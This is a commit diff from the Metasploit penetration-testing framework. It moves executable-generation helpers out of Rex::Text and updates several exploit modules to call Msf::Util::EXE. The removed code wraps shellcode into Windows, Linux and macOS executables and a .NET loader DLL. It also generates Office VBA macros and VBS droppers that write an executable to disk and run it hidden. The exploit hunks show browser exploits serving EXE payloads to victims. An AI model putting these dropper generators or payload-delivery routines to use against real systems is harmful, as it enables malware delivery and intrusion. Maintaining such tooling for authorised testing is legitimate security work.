removed executable generation routines from Rex::Text (use Msf::Util::EXE), Fixes #660

git-svn-id: file:///home/svn/framework3/trunk@7760 4d416f70-5f16-0410-b530-b9f4589650da

lib/rex/text.rb

@@ -563,302 +563,7 @@ module Text
 		Digest::MD5.hexdigest(str)
 	end
 
-	##
-	#
-	# Executable generators
-	#
-	##
-	
-	# XXX: depends on the Msf code being loaded, not just Rex
-	def self.to_executable(arch, plat, code, note='')
 
-		if (arch.index(ARCH_X86))
-
-			if (plat.index(Msf::Module::Platform::Windows))
-				return Rex::Text.to_win32pe(code, note)
-			end
-
-			if (plat.index(Msf::Module::Platform::Linux))
-				return Rex::Text.to_linux_x86_elf(code, note)
-			end
-			
-			if(plat.index(Msf::Module::Platform::OSX))
-				return Rex::Text.to_osx_x86_macho(code, note)		
-			end	
-			
-			# XXX: Add remaining x86 systems here					
-		end
-		
-		if( arch.index(ARCH_X86_64) or arch.index( ARCH_X64 ) )
-			if (plat.index(Msf::Module::Platform::Windows))
-				return Rex::Text.to_win64pe(code, note)
-			end
-		end
-		
-		if(arch.index(ARCH_ARMLE))
-			if(plat.index(Msf::Module::Platform::OSX))
-				return Rex::Text.to_osx_arm_macho(code, note)		
-			end
-			# XXX: Add Linux here
-		end
-
-		if(arch.index(ARCH_PPC))
-			if(plat.index(Msf::Module::Platform::OSX))
-				return Rex::Text.to_osx_ppc_macho(code, note)	
-			end
-			# XXX: Add PPC OS X and Linux here			
-		end						
-		nil
-	end
-
-	
-	def self.to_win32pe(code = "\xcc", note="")
-		pe = ''
-
-		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "data", "templates", "template.exe"), "rb")
-		pe = fd.read(fd.stat.size)
-		fd.close
-
-		bo = pe.index('PAYLOAD:')
-		pe[bo,  2048] = [code].pack('a2048') if bo
-		pe[136,    4] = [rand(0x100000000)].pack('V')
-
-		ci = pe.index("\x31\xc9" * 160)
-		cd = pe.index("\x31\xc9" * 160, ci + 320)
-		rc = pe[ci+320, cd-ci-320]
-		
-		# 640 + rc.length bytes of room to store an encoded rc at offset ci
-		
-		
-
-		return pe
-	end
-	
-	def self.to_win64pe(code = "\xcc", note="")
-		pe = ''
-
-		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "data", "templates", "template_x64_windows.exe"), "rb")
-		pe = fd.read(fd.stat.size)
-		fd.close
-
-		bo = pe.index('PAYLOAD:')
-		pe[bo,  2048] = [code].pack('a2048') if bo
-
-		return pe
-	end
-	
-	def self.to_win32pe_service(code = "\xcc", name="SERVICENAME")
-		pe = ''
-
-		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "data", "templates", "service.exe"), "rb")
-		pe = fd.read(fd.stat.size)
-		fd.close
-
-		bo = pe.index('PAYLOAD:')
-		pe[bo, 2048] = [code].pack('a2048') if bo
-
-		bo = pe.index('SERVICENAME')
-		pe[bo, 11] = [name].pack('a11') if bo
-		
-		pe[136, 4] = [rand(0x100000000)].pack('V')
-
-		return pe
-	end
-	
-	def self.to_osx_arm_macho(code = "", note="")
-		mo = ''
-
-		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "data", "templates", "template_armle_darwin.bin"), "rb")
-		mo = fd.read(fd.stat.size)
-		fd.close
-
-		bo = mo.index( "\x90\x90\x90\x90" * 1024 )
-		co = mo.index( " " * 512 )
-
-		mo[bo, 2048] = [code].pack('a2048') if bo
-		mo[co, 512]  = [note].pack('a512') if co
-
-		return mo
-	end
-
-	def self.to_osx_ppc_macho(code = "", note="")
-		mo = ''
-
-		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "data", "templates", "template_ppc_darwin.bin"), "rb")
-		mo = fd.read(fd.stat.size)
-		fd.close
-
-		bo = mo.index( "\x90\x90\x90\x90" * 1024 )
-		co = mo.index( " " * 512 )
-
-		mo[bo, 2048] = [code].pack('a2048') if bo
-		mo[co, 512]  = [note].pack('a512') if co
-
-		return mo
-	end
-	
-	def self.to_osx_x86_macho(code = "", note="")
-		mo = ''
-
-		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "data", "templates", "template_x86_darwin.bin"), "rb")
-		mo = fd.read(fd.stat.size)
-		fd.close
-
-		bo = mo.index( "\x90\x90\x90\x90" * 1024 )
-		co = mo.index( " " * 512 )
-
-		mo[bo, 2048] = [code].pack('a2048') if bo
-		mo[co, 512]  = [note].pack('a512') if co
-
-		return mo
-	end
-		
-	def self.to_linux_x86_elf(code = "", note="")
-		mo = ''
-
-		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "data", "templates", "template_x86_linux.bin"), "rb")
-		mo = fd.read(fd.stat.size)
-		fd.close
-
-		bo = mo.index( "\x90\x90\x90\x90" * 1024 )
-		co = mo.index( " " * 512 )
-
-		mo[bo, 2048] = [code].pack('a2048') if bo
-		mo[co, 512]  = [note].pack('a512') if co
-
-		return mo
-	end
-
-	def self.to_exe_vba(exe='')
-		vba = ""
-		pcs = (exe.length/2000)+1
-		idx = 0
-		
-		var_base_idx = 0
-		var_base     = rand_text_alpha(2).capitalize
-		
-		var_bytes = var_base + (var_base_idx+=1).to_s
-		var_initx = var_base + rand_text_alpha(1) + (var_base_idx+=1).to_s
-		
-		vba << "Dim #{var_bytes}(#{exe.length}) as Byte\r\n\r\n"
-		1.upto(pcs) do |pc|
-			max = 0
-			vba << "Sub #{var_initx}#{pc}()\r\n"
-			
-			while(c = exe[idx] and max < 2000)
-				vba << "\t#{var_bytes}(#{idx}) = &H#{("%.2x" % c).upcase}\r\n"
-				idx += 1
-				max += 1
-			end	
-			vba << "End Sub\r\n"
-		end
-		
-		var_lname = var_base + (var_base_idx+=1).to_s
-		var_lpath = var_base + (var_base_idx+=1).to_s
-		var_appnr = var_base + (var_base_idx+=1).to_s
-		var_datnr = var_base + (var_base_idx+=1).to_s
-		
-		vba << "Sub Auto_Open()\r\n"
-		vba << "\tDim #{var_appnr} As Integer\r\n"
-		vba << "\tDim #{var_datnr} As Integer\r\n"
-		vba << "\tDim #{var_lname} As String\r\n"
-		vba << "\tDim #{var_lpath} As String\r\n"
-		vba << "\t#{var_lname} = \"#{rand_text_alpha(rand(8)+8)}.exe\"\r\n"
-		vba << "\t#{var_lpath} = Environ(\"USERPROFILE\")\r\n"
-		vba << "\tChDrive (#{var_lpath})\r\n"
-		vba << "\tChDir (#{var_lpath})\r\n"
-		vba << "\t#{var_datnr} = FreeFile()\r\n"
-		vba << "\tOpen #{var_lname}  For Binary Access Read Write As #{var_datnr}\r\n"
-		
-		1.upto(pcs) do |pc|
-			vba << "\t#{var_initx}#{pc}\r\n"
-		end
-		
-		vba << "\tPut #{var_datnr}, , #{var_bytes}\r\n"
-		vba << "\tClose #{var_datnr}\r\n"
-		vba << "\t#{var_appnr} = Shell(#{var_lname}, vbHide)\r\n"
-		vba << "End Sub\r\n"
-		
-		vba << "Sub AutoOpen()\r\n"
-		vba << "\tAuto_Open\r\n"
-		vba << "End Sub\r\n"
-		
-		vba << "Sub Workbook_Open()\r\n"
-		vba << "\tAuto_Open\r\n"
-		vba << "End Sub\r\n"
-				
-	end
-
-	def self.to_win32pe_vba(code = "\xcc", note="")
-		to_exe_vba(to_win32pe(code, note))
-	end
-
-	def self.to_exe_vbs(exes = '')
-		exe = exes.unpack("C*")
-		vbs = ""
-		var_bytes = rand_text_alpha(rand(8)+8)
-		var_fname = rand_text_alpha(rand(8)+8)
-		var_func = rand_text_alpha(rand(8)+8)
-		var_stream = rand_text_alpha(rand(8)+8)
-		var_obj = rand_text_alpha(rand(8)+8)
-		var_shell = rand_text_alpha(rand(8)+8)
-
-		vbs << "Function #{var_func}()\r\n"
-
-		vbs << "#{var_bytes} = Chr(&H#{("%02x" % exe[0])})"
-		
-		1.upto(exe.length) do |byte|
-			vbs << "&Chr(&H#{("%02x" % exe[byte])})" 
-		end	
-		vbs << "\r\n"
-		
-		vbs << "Dim #{var_obj}\r\n"
-		vbs << "Set #{var_obj} = CreateObject(\"Scripting.FileSystemObject\")\r\n"
-		vbs << "Dim #{var_stream}\r\n"
-		vbs << "Set #{var_stream} = #{var_obj}.CreateTextFile(\"#{var_fname}.exe\")\r\n"
-		vbs << "#{var_stream}.Write #{var_bytes}\r\n"
-		vbs << "#{var_stream}.Close\r\n"
-		vbs << "Dim #{var_shell}\r\n"
-		vbs << "Set #{var_shell} = CreateObject(\"Wscript.Shell\")\r\n"
-		vbs << "#{var_shell}.run(\"#{var_fname}.exe\")\r\n"
-		vbs << "End Function\r\n"
-		vbs << "#{var_func}\r\n"
-	end
-
-	def self.to_win32pe_vbs(code = "\xcc", note="")
-		to_exe_vbs(to_win32pe(code, note))
-	end
-
-	# Creates a .NET DLL which loads data into memory
-	# at a specified location with read/execute permissions
-	#    - the data will be loaded at: base+0x2065
-	#    - max size is 0x8000 (32768)
-	def self.to_dotnetmem(base=0x12340000, data="")
-		pe = ''
-
-		fd = File.open(File.join(File.dirname(__FILE__), "..", "..", "data", "templates", "dotnetmem.dll"), "rb")
-		pe = fd.read(fd.stat.size)
-		fd.close
-
-		# Configure the image base
-		pe[180, 4] = [base].pack('V')
-		
-		# Configure the TimeDateStamp
-		pe[136, 4] = [rand(0x100000000)].pack('V')
-
-		# XXX: Unfortunately we cant make this RWX only RX
-		# Mark this segment as read-execute AND writable
-		# pe[412,4] = [0xe0000020].pack("V")
-		
-		# Write the data into the .text segment
-		pe[0x1065, 0x8000] = [data].pack("a32768")
-		
-		# Generic a randomized UUID
-		pe[37656,16] = Rex::Text.rand_text(16)
-		
-		return pe
-	end
-				
 	##
 	#
 	# Generators

modules/exploits/osx/email/mailapp_image_exec.rb

@@ -151,11 +151,11 @@ class Metasploit3 < Msf::Exploit::Remote
 			bin = ''
 			
 			if(target.arch.index(ARCH_PPC))
-				bin = Rex::Text.to_osx_ppc_macho(payload.encoded, '')
+				bin = Msf::Util::EXE.to_osx_ppc_macho(framework, payload.encoded)
 			end
 			
 			if(target.arch.index(ARCH_X86))
-				bin = Rex::Text.to_osx_x86_macho(payload.encoded, '')
+				bin = Msf::Util::EXE.to_osx_x86_macho(framework, payload.encoded)
 			end	
 					
 			cmd = Rex::Text.encode_base64(bin, "\r\n")

modules/exploits/windows/browser/aol_icq_downloadagent.rb

@@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		if (request.uri.match(/PAYLOAD/))
 			return if ((p = regenerate_payload(cli)) == nil)
-			data = Rex::Text.to_win32pe(p.encoded, '') 
+			data = Msf::Util::EXE.to_win32pe(framework, p.encoded)
 			print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
 			send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
 			return

modules/exploits/windows/browser/greendam_url.rb

@@ -17,7 +17,7 @@
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-	Rank = NormalRanking
+	Rank = NormalRanking
 
 	include Msf::Exploit::Remote::HttpServer::HTML
 
@@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			vtable << p.encoded
 			send_response(
 				cli, 
-				Rex::Text.to_dotnetmem(ibase, vtable), 
+				Msf::Util::EXE.to_dotnetmem(ibase, vtable),
 				{
 					'Content-Type' => 'application/x-msdownload',
 					'Connection'   => 'close',

modules/exploits/windows/browser/ie_xml_corruption.rb

@@ -153,7 +153,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			vtable << p.encoded
 			send_response(
 				cli,
-				Rex::Text.to_dotnetmem(ibase, vtable),
+				Msf::Util::EXE.to_dotnetmem(ibase, vtable),
 				{
 					'Content-Type' => 'application/x-msdownload',
 					'Connection'   => 'close',

modules/exploits/windows/browser/persits_xupload_traversal.rb

@@ -123,7 +123,6 @@ function #{func}()
 
 		print_status("Sending payload exe to #{cli.peerhost}:#{cli.peerport}...")
 		return if ((p = regenerate_payload(cli)) == nil)
-		#data = Rex::Text.to_win32pe(p.encoded, '')
 		data = Msf::Util::EXE.to_win32pe(framework,p.encoded)
 		
 		# send the exe

modules/exploits/windows/browser/symantec_altirisdeployment_downloadandinstall.rb

@@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		if (request.uri.match(/PAYLOAD/))
 			return if ((p = regenerate_payload(cli)) == nil)
-			data = Rex::Text.to_win32pe(p.encoded, '') 
+			data = Msf::Util::EXE.to_win32pe(framework, p.encoded)
 			print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
 			send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
 			return

modules/exploits/windows/motorola/timbuktu_fileupload.rb

@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		connect
 
 		exe  = rand_text_alpha(8) + ".exe"
-		data = Rex::Text.to_win32pe(payload.encoded, '')
+		data = Msf::Util::EXE.to_win32pe(framework, payload.encoded)
 
                 pkt1 =  "\x00\x01\x6B\x00\x00\xB0\x00\x23\x07\x22\x03\x07\xD6\x69\x6D\x3B"
                 pkt1 << "\x27\xA8\xD0\xF2\xD6\x69\x6D\x3B\x27\xA8\xD0\xF2\x00\x09\x01\x41"